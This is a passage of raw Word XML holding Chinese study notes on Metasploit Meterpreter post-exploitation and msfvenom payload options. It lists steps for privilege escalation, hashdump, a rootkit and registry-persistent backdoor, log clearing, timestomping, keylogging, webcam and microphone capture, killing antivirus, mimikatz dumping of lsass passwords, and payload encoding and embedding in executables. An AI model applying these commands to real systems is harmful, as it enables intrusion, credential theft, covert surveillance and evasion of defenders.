      <w:r w:rsidRPr="00333764">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>C:\Windows\TEMP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具体看你怎么打进去的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kill 掉杀毒软件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC2112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igrate隐藏Metepreter进程，比如说svchost.exe、explorer.exe-》getsystem 重新获得系统权限-》hashdump-》用shell命令来访问目标机器的命令提示符，并“netsh advfirewall firewall” 来更改防火墙设置-》使用execute -f安装rootkit与后门-》edit修改rootkit的配置文件-》测试后门-》使用reg命令更改注册表来持久化后门（开机启动）-》clearev清楚日志</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC2112" w:rsidRDefault="00BC2112" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>migrate –N explorer.exe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timetomp 关系文件时间的操作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  <w:t>timetomp file -v 查看文件几个时间的详细情况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  <w:t>timetomp file -z "8/10/2010 12:01:01"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A7760" w:rsidRPr="003A7760" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>run vnc这个命令开启远程桌面，</w:t>
      </w:r>
      <w:r w:rsidR="005B63AF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还行吧，但是目标机器不能是虚拟机，因为</w:t>
      </w:r>
      <w:r w:rsidR="005B63AF">
        <w:t>Hyper-v对</w:t>
      </w:r>
      <w:r w:rsidR="005B63AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VNC支持不行。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keyscan_start：开始键盘记录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keyscan_dump：下载键盘记录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keyscan_stop：结束键盘记录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record_mic：录制声音（如果目标主机上有话筒的话）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webcam_chat：查看摄像头接口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webcam_list：查看摄像头列表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webcam_stream：获取摄像头视频</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="00244957" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244957">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>run killav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 杀死存在的</w:t>
      </w:r>
      <w:r w:rsidRPr="00244957">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>regedit.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00244957">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>taskmgr.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37EA5" w:rsidRDefault="00F37EA5" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37EA5">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>run checkvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断是否为虚拟环境</w:t>
      </w:r>
      <w:r w:rsidR="003540BA">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（实为</w:t>
      </w:r>
      <w:r w:rsidR="003540BA">
        <w:t>run post/windows/gather/checkvm</w:t>
      </w:r>
      <w:r w:rsidR="003540BA">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA686B" w:rsidRDefault="00CA686B" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>run post/windows/gather/enum_applications #获取安装软件信息</w:t>
      </w:r>
      <w:r w:rsidR="0062573F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0062573F">
        <w:t>但是这个不能像checkvm一样缩写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00410D6D" w:rsidRPr="005D5318" w:rsidRDefault="00410D6D" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load mimikatz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>然后msv</w:t>
      </w:r>
      <w:r w:rsidR="000F49DC">
        <w:t>确保当前进程是系统权限</w:t>
      </w:r>
      <w:r w:rsidR="000F49DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="000F49DC">
        <w:t>最后kerberos导出明文密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>不过只能在x86上面使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="001D05EC" w:rsidP="005D5318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run getgui </w:t>
      </w:r>
      <w:r w:rsidR="00001899">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>不过这可能是windows专业版上的事情</w:t>
      </w:r>
      <w:r w:rsidR="00BC62AD">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00BC62AD">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>家庭普通版上面端口就开启失败了</w:t>
      </w:r>
      <w:r w:rsidR="002023DC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（可以使用RDPWrap来开启，需要一个在管理员组中有密码的账户来进行登录，我成功了一次是自己创建了一个账户然后加入到管理员账户中）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A7760" w:rsidRDefault="003A7760" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">load </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>kimi 使用</w:t>
      </w:r>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>lsass.exe进程的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D05EC" w:rsidRPr="001D05EC" w:rsidRDefault="001D05EC" w:rsidP="001D05EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D05EC" w:rsidRPr="001D05EC" w:rsidRDefault="001D05EC" w:rsidP="001D05EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D05EC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001D05EC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-e        Enable RDP only.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D05EC" w:rsidRPr="001D05EC" w:rsidRDefault="001D05EC" w:rsidP="001D05EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D05EC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -f &lt;opt&gt;  Forward RDP Connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D05EC" w:rsidRPr="001D05EC" w:rsidRDefault="001D05EC" w:rsidP="001D05EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D05EC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -h        Help menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D05EC" w:rsidRPr="001D05EC" w:rsidRDefault="001D05EC" w:rsidP="001D05EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D05EC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -p &lt;opt&gt;  The Password of the user to add.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D05EC" w:rsidRDefault="001D05EC" w:rsidP="0024477C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D05EC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-u &lt;opt&gt;  The Username of the user to add.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024477C" w:rsidRPr="005D5318" w:rsidRDefault="0024477C" w:rsidP="0024477C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">run getgui –e –f </w:t>
      </w:r>
      <w:r w:rsidR="00A220D0">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>LPORT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sfvenom命令用来产生恶意的攻击载荷模块并且对其进行编码 -p指定模块 -o显示填充攻击载荷模块所需的选项 --help-formats显示当前模块可以创建为哪些格式的攻击载荷模块如exe、dll、macho（Mach-O格式全称为Mach Object文件格式的缩写,是mac上可执行文件的格式）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>Options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00A752BA" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542673">
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-p, --payload    &lt;payload&gt;       </w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指定需要使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>payload(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>攻击荷载</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。如果需要使用自定义的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，请使用</w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>'-'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>stdin</w:t>
      </w:r>
      <w:r w:rsidRPr="00A752BA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    -l, --list       [module_type]   </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>列出指定模块的所有可用资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>模块类型包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>: payloads, encoders, nops, all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    -n, --nopsled    &lt;length&gt;        </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>预先指定一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>NOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>滑动长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00050130" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542673">
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>  -f, --format     &lt;format&gt;        </w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指定输出格式</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> --help-formats </w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>来获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>支持的输出格式列表</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRDefault="00542673" w:rsidP="00E63F30">
      <w:pPr>
        <w:ind w:firstLine="195"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-e, --encoder    [encoder]       </w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指定需要使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>encoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（编码器）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E63F30" w:rsidRPr="00E63F30" w:rsidRDefault="00E63F30" w:rsidP="00E63F30">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63F30">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-i, --iterations &lt;count&gt;         </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63F30">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63F30">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63F30">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的编码次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    -a, --arch       &lt;architecture&gt;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>的目标架构</w:t>
      </w:r>
      <w:r w:rsidR="00FE7380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00FE7380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>架构就是</w:t>
      </w:r>
      <w:r w:rsidR="00FE7380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00FE7380">
        <w:t>86</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>        --platform   &lt;platform&gt;      </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>的目标平台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    -s, --space      &lt;length&gt;        </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>设定有效攻击荷载的最大长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00F81D59" w:rsidRDefault="00542673" w:rsidP="00F81D59">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81D59">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>    -b, --bad-chars  &lt;list&gt;          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F81D59">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>设定规避字符集，比如</w:t>
      </w:r>
      <w:r w:rsidR="008E2C97" w:rsidRPr="00F81D59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00F81D59" w:rsidRPr="00F81D59">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-b '\x00'</w:t>
      </w:r>
      <w:r w:rsidR="008E2C97" w:rsidRPr="00F81D59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>      </w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>  -c, --add-code   &lt;path&gt;          </w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>指定一个附加的</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>win32 shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00050130">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>？？？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-x, --template   &lt;path&gt;          </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指定一个自定义的可执行文件作为模板</w:t>
      </w:r>
      <w:r w:rsidR="00210451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00210451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>附加到一个</w:t>
      </w:r>
      <w:r w:rsidR="00210451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00210451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="00210451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3E8D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-k, --keep                       </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3E8D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>保护模板程序的动作，注入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3E8D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3E8D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>作为一个新的进程运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>        --payload-options            </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>列举</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>的标准选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00AC2C49" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542673">
        <w:t>    -</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2C49">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>o, --out   &lt;path&gt;               </w:t>
      </w:r>
      <w:r w:rsidR="009302D3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>相当于</w:t>
      </w:r>
      <w:r w:rsidR="009302D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    -v, --var-name &lt;name&gt;            </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>指定一个自定义的变量，以确定输出格式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00050130" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>        --shellest                   </w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>最小化生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00050130">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>    -h, --help                       </w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>查看帮助选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542673" w:rsidRPr="00542673" w:rsidRDefault="00542673" w:rsidP="00542673">
      <w:r w:rsidRPr="00542673">
        <w:t>        --help-formats               </w:t>
      </w:r>
